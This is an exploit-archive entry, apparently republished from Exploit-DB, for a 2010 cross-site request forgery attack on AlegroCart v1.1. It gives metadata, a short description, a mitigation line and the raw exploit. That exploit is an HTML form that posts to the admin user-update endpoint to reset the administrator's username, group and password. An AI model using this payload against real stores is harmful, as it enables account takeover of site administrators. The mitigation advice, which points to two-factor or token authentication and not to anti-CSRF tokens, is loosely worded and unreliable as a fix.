Home Of AlegroCart v1.1 - Xsrf Change Administrator Password

vendor:

Home Of AlegroCart

by:

The.Morpheus

8,8

CVSS

HIGH

Cross-Site Request Forgery (XSRF)

352

CWE

Product Name: Home Of AlegroCart

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:alegrocart:home_of_alegrocart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Home Of AlegroCart v1.1 – Xsrf Change Administrator Password

A vulnerability in Home Of AlegroCart v1.1 allows an attacker to change the administrator password by sending a malicious request to the server. The malicious request contains a form with the username, first name, last name, email, user group, password, and confirm fields. The attacker can set the username, first name, last name, and email fields to 'admin' and the user group to 'Top Administrator'. The attacker can then set the password and confirm fields to the desired password. When the form is submitted, the administrator password is changed to the desired password.

Mitigation:

To mitigate this vulnerability, the application should use a secure authentication mechanism such as two-factor authentication or a secure token-based authentication system.

Source

Exploit-DB raw data:

[#]----------------------------------------------------------------[#]
#
# [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password
#
# // Author Info
# [x] Author: The.Morpheus
# [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com>
# [x] Thanks: Türksec.&#304;nfo ~ Nd And Tg Tayfa :P
# [x] Date : 01.02.2010
#
[#]-------------------------------------------------------------------------------------------[#]

# Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4

# [x] Exploit :
#
# [ XSRF ]
#
# [ Login ]
# http://[server]/[path]/admin/
#
# // Start XSRF
|-------------------------------------------------------------------------------|

<form action="http://server/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form">
width="185"><span class="required">*</span> Username:</td>
<input type="text" name="username" value="admin">
<span class="required">*</span> First Name:</td>
<input type="text" name="firstname" value="admin">
<span class="required">*</span> Last Name:</td>
<input type="text" name="lastname" value="admin">
<td>E-Mail:</td>
<input type="text" name="email" value="admin"></td>
<td>User Group:</td>
<td><select name="user_group_id">
<option value="1" selected>Top Administrator</option>
</select></td>
<td>Password:</td>
<input type="password" name="password" value="" >
<td>Confirm:</td>
<input type="password" name="confirm" value="">
</form>


|-------------------------------------------------------------------------------|
# // End of attack ~
#
[#]------------------------------------------------------------------------------------------[#]